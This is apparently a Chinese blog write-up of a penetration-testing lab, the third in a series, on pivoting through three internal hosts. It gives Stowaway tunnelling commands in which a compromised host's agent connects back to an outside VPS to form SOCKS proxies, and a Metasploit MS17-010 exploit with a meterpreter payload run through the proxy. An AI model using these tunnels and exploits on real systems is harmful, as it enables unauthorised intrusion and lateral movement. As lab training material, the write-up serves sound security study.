内网横向靶场——记录一次横向渗透(三)

今天是这个靶场的最后一篇工具使用了,这次的工具比前两篇文章的更加稳定以及方便;当然,主要还是以工具的使用以及思路为主;

文章目录


免责声明

靶场演示免责声明

本靶场演示环境仅为网络安全技术学习、研究及技能实践专用,旨在提升使用者的网络安全认知与技术应用能力。

核心使用规范

  1. 使用者承诺仅在本靶场授权范围内进行操作,不得利用靶场环境及相关技术攻击、入侵、破坏任何第三方的计算机系统、网络设备或数据资源。
  2. 严禁将靶场所学技术用于违反《网络安全法 》《刑法》等法律法规的非法活动,不得侵犯他人合法的网络权益与数据隐私。
  3. 所有操作均需在合法合规、获得明确授权的前提下进行,使用者独立对自身操作行为及可能产生的后果承担全部责任。

免责说明

  1. 靶场搭建方、维护方仅提供学习演示环境,不参与、不指导任何非法操作,对使用者超出授权范围的违规行为及衍生后果不承担任何法律责任。
  2. 因使用者违规使用靶场技术或环境导致的法律纠纷、经济损失、行政处罚等一切后果,均由使用者自行承担,与靶场相关方无关。
  3. 本声明自使用者访问或使用靶场环境之日起生效,如有未尽事宜,均依据国家相关法律法规执行。

本篇文章请大家以网络安全技术学习为目的观看,仅用于知识研究与技能实践,严禁将相关内容用于任何违法违规活动,所有操作需在合法授权范围内进行,使用者自行承担违规后果。


靶场简介

内网结构

本次实验靶场采用多层级内网渗透模型,典型配置包含三个递进式靶机(Target1、Target2、Target3),通过虚拟网络隔离形成企业级内网架构

  • 基础层(Target1-Centos7)
    • 部署 Web 服务(如 ThinkPHP 框架),开放 80、22 等常见端口,存在Web 漏洞。
    • 两个网卡:(用于连接内外网,充当中间服务器的作用)连接外网,作为渗透入口,需通过漏洞获取初始权限。
    • 外网网段,如 192.168.44.0/24;内网网段:192.168.22.0/24
  • 中间层(Target2-Ubuntu)
    • 位于内网(VMnet2 网段,如 192.168.22.0/24),需通过 Target1 作为跳板机横向移动。
      可能存在权限提升漏洞(如 CVE-2021-4034)或服务弱口令,需进一步渗透。
    • 外网机器(44网段的主机)无法直接访问到这台机器;
  • 核心层(Target3-Windows)
    • 处于更深层内网(VMnet3 网段,如 192.168.33.0/24),通常为 Windows 系统,开放 445 端口,可利用永恒之蓝(MS17-010)等漏洞攻击。

具体结构显示:

信息收集 部分这里就不赘述了,主要是讲解不同工具的使用以及思路;详细请看这篇文章:内网横向靶场---记录一次横向操作(手把手详细思路教学)

好了话不多说,我们直接开始;


第一层代理

所需工具:

  • 一台VPS(阿里云,腾讯云,京东云等,随便买一台即可)
    • 如果没有VPS,也可以用kali代替,没关系的
  • stowaway内网横向工具
    • 包含stowaway客户端),stowaway(服务端)
  • 蚁剑

服务端操作(VPS或者kali)

首先将stowaway上传到VPS(或者你的kali) ---(用来运行服务端):

然后指定我们监听的端口:9999

bash 复制代码
# 执行命令
./admin -l 9999 -s hack

新开一个窗口,查看端口是否成功监听:

--

客户端操作(192.168.22.11主机)

这里我们通过ThinkPHP框架的RCE漏洞,也是成功用蚁剑连接上了,所以我们将本次使用的工具stowaway上传到/tmp目录下:

通过蚁剑将stowaway上传到192.168.22.11主机上(用来运行客户端,来建立socks代理);

bash 复制代码
# 命令执行
chmod +x agent
./agent -c VPS地址:9999 -s hack

执行命令;

此时,服务端有了反应:

然后我们直接在服务端,输入socks 1081开启VPS的端口,进行隧道的搭建:

横向操作:

然后我们再用浏览器的插件去配置相应的服务,从而成功访问192.168.22.22搭建的Web页面:

也是成功访问:

图片概括:

第一层代理操作的关系如上图;


搭建第二层代理

接下来我们要做的就是访问192.168.33.0/24这个内网网段了;

服务端

在服务端:进入node 0 节点,执行listen,设置监听端口7000,开启监听模式:

bash 复制代码
# 执行命令
use 0
listen
1
7000

客户端

在Target1上可以看到agent监听了7000端口:

然后我们又经过了一系列操作(具体看这一篇文章),进入到了192.168.22.22 的蚁剑(需要新打开一个蚁剑窗口):

复制代码
在Target2中连接Target1的7000端口(相当于VPS和22主机中间搭了一座桥,11主机作为中间人负责联系)

这里我们需要打开蚁剑的代理设置才能连接到22主机:

然后上传工具:

进入目录,输入命令:

执行命令:

bash 复制代码
chmod +x agent
./agent -c 192.168.22.11:7000 -s hack

此时服务端:

进入到node 1后,我们同样的可以去建立一个socks代理:

bash 复制代码
socks 1082

查看是否正确建立监听:

(处于监听状态)

攻击步骤:

然后打开kali,通过msf进行攻击:

使用命令如下:

bash 复制代码
msfconsole
use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp
set proxies socks5:117.x.x.x:1082
# setg proxies socks5:117.x.x.x:1082
set rhosts 192.168.33.33

exploit 

成功拿到权限:

至此,渗透攻击结束;

图片概括:

第二层代理操作的关系如上图;

总结

没有总结,期待下次再见~

相关推荐
用户962377954485 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544810 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star10 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544813 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
BingoGo2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
BingoGo3 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进
后端·php